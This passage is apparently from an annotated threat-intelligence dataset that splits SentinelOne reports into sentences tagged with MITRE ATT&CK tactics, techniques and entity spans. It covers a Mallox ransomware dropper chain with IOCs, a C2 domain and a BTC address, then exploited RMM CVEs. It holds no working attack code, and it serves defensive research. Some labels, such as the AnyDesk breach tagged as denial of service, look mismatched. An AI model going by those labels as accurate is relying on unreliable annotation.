"Infrastructure_Indicator" }, { "text": "launches a PowerShell script", "start": 13, "end": 41, "label": "Action" }, { "text": "downloads a copy of Mallox", "start": 47, "end": 73, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s78-080dfc", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 78, "context_before": "This dropper launches a PowerShell script that downloads a copy of Mallox from the same server (as id.exe ; SHA1:\n0f1aea2cf0c9f2de55d2b920618a5948c5e5e119\n).", "sentence_text": "The PowerShell commands are embedded within the nested MyClass.class as Java bytecode.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" }, { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "The PowerShell commands are embedded within the nested MyClass.class as Java bytecode", "entities": [ { "text": " PowerShell commands", "start": 3, "end": 23, "label": "MalwareTool" }, { "text": "MyClass.class ", "start": 55, "end": 69, "label": "MalwareTool" }, { "text": "are embedded within the nested MyClass.class as Java bytecode.", "start": 24, "end": 86, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s79-a3e31d", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 79, "context_before": "The PowerShell commands are embedded within the nested MyClass.class as Java bytecode.", "sentence_text": "MyClass.class\ncontains reference to a temporary DNS resolution for the host at grovik71.theweb[.]place", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.004", "name": "DNS" } ], "procedure": "contains reference to a temporary DNS resolution for the host at grovik71.theweb[.]place", "entities": [ { "text": "MyClass.class", "start": 0, "end": 13, "label": "MalwareTool" }, { "text": "grovik71.theweb[.]place", "start": 79, "end": 102, "label": "Infrastructure_Indicator" }, { "text": "reference to a temporary DNS resolution for the host", "start": 23, "end": 75, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s80-5f965e", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 80, "context_before": "MyClass.class\ncontains reference to a temporary DNS resolution for the host at grovik71.theweb[.]place", "sentence_text": "Jre-8u401-windows-x64.exe\nis a full offline installer of the JRE (SHA1:\ndc3f98dded6c1f1e363db6752c512e01ac9433f3\n).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s81-98aa8b", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 81, "context_before": "Jre-8u401-windows-x64.exe\nis a full offline installer of the JRE (SHA1:\ndc3f98dded6c1f1e363db6752c512e01ac9433f3\n).", "sentence_text": "Finally, multiple additional dropper/payload sets were hosted at the root of the site.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "multiple additional dropper/payload sets were hosted at the root of the site", "entities": [ { "text": "dropper/payload sets", "start": 29, "end": 49, "label": "MalwareTool" }, { "text": "root of the site.", "start": 69, "end": 86, "label": "Infrastructure_Indicator" }, { "text": "hosted", "start": 55, "end": 61, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s82-13b0cc", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 82, "context_before": "Finally, multiple additional dropper/payload sets were hosted at the root of the site.", "sentence_text": "These include packages split for 32 and 64 bit use, and a .LNK -based dropper for the payloads.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "packages split for 32 and 64 bit use, and a .LNK-based dropper for the payloads", "entities": [ { "text": " .LNK -based dropper", "start": 57, "end": 77, "label": "MalwareTool" }, { "text": "packages", "start": 14, "end": 22, "label": "MalwareTool" }, { "text": "split for 32 and 64 bit use,", "start": 23, "end": 51, "label": "Action" }, { "text": "dropper for the payloads.", "start": 70, "end": 95, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s83-44f578", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 83, "context_before": "These include packages split for 32 and 64 bit use, and a .LNK -based dropper for the payloads.", "sentence_text": "Reader.img\nand\nReader+x86.img\nare compressed disk image files that contain Mallox (Windows) payloads for 64 and 32 bit systems, respectively.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "are compressed disk image files that contain Mallox (Windows) payloads for 64 and 32 bit systems", "entities": [ { "text": "Reader.img", "start": 0, "end": 10, "label": "MalwareTool" }, { "text": "Reader+x86.img", "start": 15, "end": 29, "label": "MalwareTool" }, { "text": "Mallox (Windows) payloads", "start": 75, "end": 100, "label": "MalwareTool" }, { "text": "contain Mallox (Windows) payloads for 64 and 32 bit systems,", "start": 67, "end": 127, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s84-0b7f25", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 84, "context_before": "Reader.img\nand\nReader+x86.img\nare compressed disk image files that contain Mallox (Windows) payloads for 64 and 32 bit systems, respectively.", "sentence_text": "Each of these images contains the same .LNK launcher (SHA1:", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Each of these images contains the same .LNK launcher", "entities": [ { "text": ".LNK launcher", "start": 39, "end": 52, "label": "MalwareTool" }, { "text": "contains ", "start": 21, "end": 30, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s85-2f2e0b", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 85, "context_before": "Each of these images contains the same .LNK launcher (SHA1:", "sentence_text": "c20e8d536804cf97584eec93d9a89c09541155bc\n), which is named Reader.lnk The payload contained within these compressed images is named red.exe red.exe (x86) - SHA1: 29936b1aa952a89905bf0f7b7053515fd72d8c5c red.exe (x64) - SHA1: 0f1aea2cf0c9f2de55d2b920618a5948c5e5e119 This instance of the 64-bit payload (SHA1:\n0f1aea2cf0c9f2de55d2b920618a5948c5e5e119\n) is identical to the prior referenced id.exe and the hosted MSiedge.exe Conclusion", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Payload contained within compressed images, identical to prior referenced files, hosted for execution", "entities": [ { "text": "Reader.lnk ", "start": 59, "end": 70, "label": "MalwareTool" }, { "text": "red.exe (x86)", "start": 140, "end": 153, "label": "MalwareTool" }, { "text": "red.exe (x64)", "start": 203, "end": 216, "label": "MalwareTool" }, { "text": " id.exe ", "start": 388, "end": 396, "label": "MalwareTool" }, { "text": "MSiedge.exe", "start": 411, "end": 422, "label": "MalwareTool" }, { "text": "c20e8d536804cf97584eec93d9a89c09541155bc", "start": 0, "end": 40, "label": "Infrastructure_Indicator" }, { "text": "29936b1aa952a89905bf0f7b7053515fd72d8c5c", "start": 162, "end": 202, "label": "Infrastructure_Indicator" }, { "text": "0f1aea2cf0c9f2de55d2b920618a5948c5e5e119", "start": 309, "end": 349, "label": "Infrastructure_Indicator" }, { "text": "0f1aea2cf0c9f2de55d2b920618a5948c5e5e119", "start": 225, "end": 265, "label": "Infrastructure_Indicator" }, { "text": "contained within these compressed images", "start": 82, "end": 122, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s86-e69197", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 86, "context_before": "c20e8d536804cf97584eec93d9a89c09541155bc\n), which is named Reader.lnk The payload contained within these compressed images is named red.exe red.exe (x86) - SHA1: 29936b1aa952a89905bf0f7b7053515fd72d8c5c red.exe (x64) - SHA1: 0f1aea2cf0c9f2de55d2b920618a5948c5e5e119 This instance of the 64-bit payload (SHA1:\n0f1aea2cf0c9f2de55d2b920618a5948c5e5e119\n) is identical to the prior referenced id.exe and the hosted MSiedge.exe Conclusion", "sentence_text": "The Kryptina-derived variants of Mallox are affiliate-specific and separate from other Linux variants of Mallox that have since emerged, an indication of how the ransomware landscape has evolved into a complex menagerie of cross-pollinated toolsets and non-linear codebases.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Affiliate-specific development of ransomware variants; separation and evolution of codebases", "entities": [ { "text": " variants of Mallox are affiliate-specific ", "start": 20, "end": 63, "label": "ThreatActor" }, { "text": " Kryptina-derived variants of Mallox ", "start": 3, "end": 40, "label": "MalwareTool" }, { "text": "other Linux variants of Mallox", "start": 81, "end": 111, "label": "MalwareTool" }, { "text": "evolved into a complex menagerie of cross-pollinated toolsets and non-linear codebases.", "start": 187, "end": 274, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s87-3ab2e5", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 87, "context_before": "The Kryptina-derived variants of Mallox are affiliate-specific and separate from other Linux variants of Mallox that have since emerged, an indication of how the ransomware landscape has evolved into a complex menagerie of cross-pollinated toolsets and non-linear codebases.", "sentence_text": "The adoption of Kryptina – a RaaS given away as a free tool after the developer’s failure to cash-in on it – by an active Mallox affiliate represents a kind of ‘levelling-up’ for the malware.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Adoption of Kryptina RaaS by an active Mallox affiliate", "entities": [ { "text": "active Mallox affiliate", "start": 115, "end": 138, "label": "ThreatActor" }, { "text": "Kryptina", "start": 16, "end": 24, "label": "MalwareTool" }, { "text": "adoption of Kryptina", "start": 4, "end": 24, "label": "Action" } ] }, { "uid": "sentinel-71_SentinelOne_report-p1-s88-c90323", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 88, "context_before": "The adoption of Kryptina – a RaaS given away as a free tool after the developer’s failure to cash-in on it – by an active Mallox affiliate represents a kind of ‘levelling-up’ for the malware.", "sentence_text": "More importantly, it demonstrates the broader trend of ransomware commoditization.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s89-b50a5f", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 89, "context_before": "More importantly, it demonstrates the broader trend of ransomware commoditization.", "sentence_text": "Individual affiliates introducing different codebases into the mix further muddies the water, ultimately increasing the level of difficulty when tracking these tools and understanding the scope of their use and adoption.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s90-a867f9", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 90, "context_before": "Individual affiliates introducing different codebases into the mix further muddies the water, ultimately increasing the level of difficulty when tracking these tools and understanding the scope of their use and adoption.", "sentence_text": "Looking forward, we expect to see more outlier platforms like Kryptina being absorbed into the TTPs leveraged by more advanced threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s91-6ecf18", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 91, "context_before": "Looking forward, we expect to see more outlier platforms like Kryptina being absorbed into the TTPs leveraged by more advanced threat actors.", "sentence_text": "IOCs\nFiles SHA1\n0b9d2895d29f7d553e5613266c2319e10afdda78\n0de92527430dc0794694787678294509964422e6\n0e83d023b9f6c34ab029206f1f11b3457171a30a\n0f1aea2cf0c9f2de55d2b920618a5948c5e5e119\n0f632f8e59b8c8b99241d0fd5ff802f31a3650cd\n1379a1b08f938f9a53082150d53efadb2ad37ae5\n21bacf8daa45717e87a39842ec33ad61d9d79cfe\n262497702d6b7f7d4af73a90cb7d0e930f9ec355\n29936b1aa952a89905bf0f7b7053515fd72d8c5c\n2b3fc20c4521848f33edcf55ed3d508811c42861\n341552a8650d2bdad5f3ec12e333e3153172ee66\n43377911601247920dc15e9b22eda4c57cb9e743\n58552820ba2271e5c3a76b30bd3a07144232b9b3\n5cf67c0a1fa06101232437bee5111fefcd8e2df4\n88a039be03abc7305db724079e1a85810088f900\n9050419cbecc88be7a06ea823e270db16f47c1ea\n93ef3578f9c3db304a979b0d9d36234396ec6ac9\na1a8922702ffa8c74aba9782cca90c939dfb15bf\nb07c725edb65a879d392cd961b4cb6a876e40e2d\nb27d291596cc890d283e0d3a3e08907c47e3d1cc\nb768ba3e6e03a77004539ae999bb2ae7b1f12c62\nc20e8d536804cf97584eec93d9a89c09541155bc\nc4d988135e960e88e7acfae79a45c20e100984b6\nd46fbc4a57dce813574ee312001eaad0aa4e52de\nd618a9655985c33e69a4713ebe39d473a4d58cde\ndc3f98dded6c1f1e363db6752c512e01ac9433f3\nee3cd3a749f5146cf6d4b36ee87913c51b9bfe93\nef2565c789316612d8103056cec25f77674d78d1\nf17d9b3cd2ba1dea125d2e1a4aeafc6d4d8f12dc\nNetwork Comms\n185[.]73.125[.]6\ngrovik71[.]theweb[.]place\nTox ID\n290E6890D02FBDCD92659056F9A95D80854534A4D76EE5D3A64AFD55E584EA398722EC2D3697\nBTC Address\n18CUq89XR81Y7Ju2UBjER14fYWTfVwpGP3\nRansomware\nShare\nJim Walter\nJim Walter is a Senior Threat Researcher at SentinelOne focusing on evolving trends, actors, and tactics within the thriving ecosystem of cybercrime and crimeware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s92-05045c", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 92, "context_before": "IOCs\nFiles SHA1\n0b9d2895d29f7d553e5613266c2319e10afdda78\n0de92527430dc0794694787678294509964422e6\n0e83d023b9f6c34ab029206f1f11b3457171a30a\n0f1aea2cf0c9f2de55d2b920618a5948c5e5e119\n0f632f8e59b8c8b99241d0fd5ff802f31a3650cd\n1379a1b08f938f9a53082150d53efadb2ad37ae5\n21bacf8daa45717e87a39842ec33ad61d9d79cfe\n262497702d6b7f7d4af73a90cb7d0e930f9ec355\n29936b1aa952a89905bf0f7b7053515fd72d8c5c\n2b3fc20c4521848f33edcf55ed3d508811c42861\n341552a8650d2bdad5f3ec12e333e3153172ee66\n43377911601247920dc15e9b22eda4c57cb9e743\n58552820ba2271e5c3a76b30bd3a07144232b9b3\n5cf67c0a1fa06101232437bee5111fefcd8e2df4\n88a039be03abc7305db724079e1a85810088f900\n9050419cbecc88be7a06ea823e270db16f47c1ea\n93ef3578f9c3db304a979b0d9d36234396ec6ac9\na1a8922702ffa8c74aba9782cca90c939dfb15bf\nb07c725edb65a879d392cd961b4cb6a876e40e2d\nb27d291596cc890d283e0d3a3e08907c47e3d1cc\nb768ba3e6e03a77004539ae999bb2ae7b1f12c62\nc20e8d536804cf97584eec93d9a89c09541155bc\nc4d988135e960e88e7acfae79a45c20e100984b6\nd46fbc4a57dce813574ee312001eaad0aa4e52de\nd618a9655985c33e69a4713ebe39d473a4d58cde\ndc3f98dded6c1f1e363db6752c512e01ac9433f3\nee3cd3a749f5146cf6d4b36ee87913c51b9bfe93\nef2565c789316612d8103056cec25f77674d78d1\nf17d9b3cd2ba1dea125d2e1a4aeafc6d4d8f12dc\nNetwork Comms\n185[.]73.125[.]6\ngrovik71[.]theweb[.]place\nTox ID\n290E6890D02FBDCD92659056F9A95D80854534A4D76EE5D3A64AFD55E584EA398722EC2D3697\nBTC Address\n18CUq89XR81Y7Ju2UBjER14fYWTfVwpGP3\nRansomware\nShare\nJim Walter\nJim Walter is a Senior Threat Researcher at SentinelOne focusing on evolving trends, actors, and tactics within the thriving ecosystem of cybercrime and crimeware.", "sentence_text": "He specializes in the discovery and analysis of emerging cybercrime \"services\" and evolving communication channels leveraged by mid-level criminal organizations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s93-60873f", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 93, "context_before": "He specializes in the discovery and analysis of emerging cybercrime \"services\" and evolving communication channels leveraged by mid-level criminal organizations.", "sentence_text": "Jim joined SentinelOne following ~4 years at a security start-up, also focused on malware research and organized crime.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s94-05eed2", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 94, "context_before": "Jim joined SentinelOne following ~4 years at a security start-up, also focused on malware research and organized crime.", "sentence_text": "Previously, he spent over 17 years at McAfee/Intel running their Threat Intelligence and Advanced Threat Research teams.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s95-467c01", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 95, "context_before": "Previously, he spent over 17 years at McAfee/Intel running their Threat Intelligence and Advanced Threat Research teams.", "sentence_text": "Prev\nLABScon23 Replay | They Spilled Oil in My Health-Boosting Smoothie", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s96-59b1bb", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 96, "context_before": "Prev\nLABScon23 Replay | They Spilled Oil in My Health-Boosting Smoothie", "sentence_text": "| A Deep Dive into the Hacktivists, Tools and Ransomware Fueling Pro-Russian Cyber Attacks November 25 2024 [FILTERED_TABLES_START]\nfbb89744bc9f65719bd5415dcf1ec9a74b24254e | 18CUq89XR81Y7Ju2UBjER14fYWTfVwpGP3 | .lmallox", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s97-2de527", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 97, "context_before": "| A Deep Dive into the Hacktivists, Tools and Ransomware Fueling Pro-Russian Cyber Attacks November 25 2024 [FILTERED_TABLES_START]\nfbb89744bc9f65719bd5415dcf1ec9a74b24254e | 18CUq89XR81Y7Ju2UBjER14fYWTfVwpGP3 | .lmallox", "sentence_text": "| smHKnqN7S1ehBz4zxya6ddwys39PJHbF7LlqIS1+Fq4=", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s98-b71fed", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 98, "context_before": "| smHKnqN7S1ehBz4zxya6ddwys39PJHbF7LlqIS1+Fq4=", "sentence_text": "| 500.0 55dc4541b72a804a7edf324d6a388569a68a2986 | 18CUq89XR81Y7Ju2UBjER14fYWTfVwpGP3 | .lmallox", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s99-88948b", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 99, "context_before": "| 500.0 55dc4541b72a804a7edf324d6a388569a68a2986 | 18CUq89XR81Y7Ju2UBjER14fYWTfVwpGP3 | .lmallox", "sentence_text": "| smHKnqN7S1ehBz4zxya6ddwys39PJHbF7LlqIS1+Fq4=", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s100-a7d962", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 100, "context_before": "| smHKnqN7S1ehBz4zxya6ddwys39PJHbF7LlqIS1+Fq4=", "sentence_text": "| 500.0 78c27c7ac1da97dc822b4af7be5f15d68f9c5e4f | 18CUq89XR81Y7Ju2UBjER14fYWTfVwpGP3 | .lmallox", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s101-728768", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 101, "context_before": "| 500.0 78c27c7ac1da97dc822b4af7be5f15d68f9c5e4f | 18CUq89XR81Y7Ju2UBjER14fYWTfVwpGP3 | .lmallox", "sentence_text": "| smHKnqN7S1ehBz4zxya6ddwys39PJHbF7LlqIS1+Fq4=", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s102-6cf001", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 102, "context_before": "| smHKnqN7S1ehBz4zxya6ddwys39PJHbF7LlqIS1+Fq4=", "sentence_text": "| 500.0 d94f890a8c92cbce50d89da2792bcfc24894c004 | 18CUq89XR81Y7Ju2UBjER14fYWTfVwpGP3 | .lmallox", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s103-3febe8", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 103, "context_before": "| 500.0 d94f890a8c92cbce50d89da2792bcfc24894c004 | 18CUq89XR81Y7Ju2UBjER14fYWTfVwpGP3 | .lmallox", "sentence_text": "| smHKnqN7S1ehBz4zxya6ddwys39PJHbF7LlqIS1+Fq4=", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s104-2520fd", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 104, "context_before": "| smHKnqN7S1ehBz4zxya6ddwys39PJHbF7LlqIS1+Fq4=", "sentence_text": "| 500.0 16ec82ac2caf0c2e4812a636dbff4bd8ef84d5c3 | 18CUq89XR81Y7Ju2UBjER14fYWTfVwpGP3 | .lmallox", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s105-66d387", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 105, "context_before": "| 500.0 16ec82ac2caf0c2e4812a636dbff4bd8ef84d5c3 | 18CUq89XR81Y7Ju2UBjER14fYWTfVwpGP3 | .lmallox", "sentence_text": "| smHKnqN7S1ehBz4zxya6ddwys39PJHbF7LlqIS1+Fq4=", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s106-c76ad9", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 106, "context_before": "| smHKnqN7S1ehBz4zxya6ddwys39PJHbF7LlqIS1+Fq4=", "sentence_text": "| 500.0 66cab82b64fbb03fecf7ca7f9ed295404a9bfe2b | 18CUq89XR81Y7Ju2UBjER14fYWTfVwpGP3 | .lmallox", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s107-7bf6f7", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 107, "context_before": "| 500.0 66cab82b64fbb03fecf7ca7f9ed295404a9bfe2b | 18CUq89XR81Y7Ju2UBjER14fYWTfVwpGP3 | .lmallox", "sentence_text": "| smHKnqN7S1ehBz4zxya6ddwys39PJHbF7LlqIS1+Fq4=", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s108-cfc7d0", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 108, "context_before": "| smHKnqN7S1ehBz4zxya6ddwys39PJHbF7LlqIS1+Fq4=", "sentence_text": "| 500.0 0bbd9a8ddbb68e2658ea4c0a4106c7406a392098", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-71_SentinelOne_report-p1-s109-0d7cc3", "source": "sentinel", "doc_id": "71_SentinelOne_report", "page_number": 1, "sentence_id": 109, "context_before": "| 500.0 0bbd9a8ddbb68e2658ea4c0a4106c7406a392098", "sentence_text": "| smHKnqN7S1ehBz4zxya6ddwys39PJHbF7LlqIS1+Fq4=", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-72_SentinelOne_report-p1-s1-abc7bc", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "In this month’s update, we also highlight a crop of CVEs in remote management and monitoring (RMM) tools that threat actors are exploiting in the wild, and as always we have the latest in ransomware updates.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploiting CVEs in RMM tools", "entities": [ { "text": "threat actors", "start": 110, "end": 123, "label": "ThreatActor" }, { "text": "ransomware", "start": 188, "end": 198, "label": "MalwareTool" }, { "text": "exploiting", "start": 128, "end": 138, "label": "Action" } ] }, { "uid": "sentinel-72_SentinelOne_report-p1-s2-81591c", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 2, "context_before": "In this month’s update, we also highlight a crop of CVEs in remote management and monitoring (RMM) tools that threat actors are exploiting in the wild, and as always we have the latest in ransomware updates.", "sentence_text": "Ransomware Reporting and Underreporting February 2024 has seen several impactful ransomware attacks reported, including :\nConcerns remain, however, that many ransomware incidents are unreported.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-72_SentinelOne_report-p1-s3-4847c2", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 3, "context_before": "Ransomware Reporting and Underreporting February 2024 has seen several impactful ransomware attacks reported, including :\nConcerns remain, however, that many ransomware incidents are unreported.", "sentence_text": "Particularly in cases where an organization is experiencing its first cybercrime incident, there may be a tendency to believe that disclosing the breach may be more damaging than paying the attackers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-72_SentinelOne_report-p1-s4-9f6fcc", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 4, "context_before": "Particularly in cases where an organization is experiencing its first cybercrime incident, there may be a tendency to believe that disclosing the breach may be more damaging than paying the attackers.", "sentence_text": "For any organization feeling that pressure, it is worth reviewing advice from the NCSC about why transparency matters to victims.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-72_SentinelOne_report-p1-s5-60905b", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 5, "context_before": "For any organization feeling that pressure, it is worth reviewing advice from the NCSC about why transparency matters to victims.", "sentence_text": "Software Products Under Active Exploitation Improving the design of software products such that exploitable flaws become “a shocking anomaly” was also part of Easterly’s vision for a safer cyber future.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-72_SentinelOne_report-p1-s6-81dae7", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 6, "context_before": "Software Products Under Active Exploitation Improving the design of software products such that exploitable flaws become “a shocking anomaly” was also part of Easterly’s vision for a safer cyber future.", "sentence_text": "Both APT groups and ‘lower tier’ crimeware actors continue to exploit vulnerabilities in Ivanti’s Connect Secure and Policy Secure products.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploit vulnerabilities in Ivanti products", "entities": [ { "text": "APT groups", "start": 5, "end": 15, "label": "ThreatActor" }, { "text": "crimeware actors", "start": 33, "end": 49, "label": "ThreatActor" }, { "text": "Ivanti’s Connect Secure and Policy Secure", "start": 89, "end": 130, "label": "Infrastructure_Indicator" }, { "text": "exploit vulnerabilities", "start": 62, "end": 85, "label": "Action" } ] }, { "uid": "sentinel-72_SentinelOne_report-p1-s7-c6d40e", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 7, "context_before": "Both APT groups and ‘lower tier’ crimeware actors continue to exploit vulnerabilities in Ivanti’s Connect Secure and Policy Secure products.", "sentence_text": "ConnectWise’s ScreenConnect has also been targeted for mass exploitation thanks to multiple RCE flaws that are trivial to exploit.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "targeted ScreenConnect for mass exploitation using trivial RCE flaws", "entities": [ { "text": "ScreenConnect", "start": 14, "end": 27, "label": "Infrastructure_Indicator" }, { "text": "targeted for mass exploitation", "start": 42, "end": 72, "label": "Action" } ] }, { "uid": "sentinel-72_SentinelOne_report-p1-s8-50c77e", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 8, "context_before": "ConnectWise’s\nScreenConnect\nhas also been targeted for mass exploitation thanks to multiple RCE flaws that are trivial to exploit.", "sentence_text": "In addition, alarm was raised this month after a response to a breach at AnyDesk found evidence of compromised production systems.\nCVEs and updates that organizations are prioritizing include :\nEmerging Trends and Tactics AI continues to push the boundaries of cybersecurity for both attackers and defenders.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1499", "name": "Endpoint Denial of Service" } ], "procedure": "breach resulting in compromised production systems", "entities": [ { "text": "AnyDesk", "start": 73, "end": 80, "label": "Infrastructure_Indicator" }, { "text": "breach", "start": 63, "end": 69, "label": "Action" }, { "text": "evidence of compromised production systems", "start": 87, "end": 129, "label": "Action" } ] }, { "uid": "sentinel-72_SentinelOne_report-p1-s9-06fa16", "source": "sentinel", "doc_id": 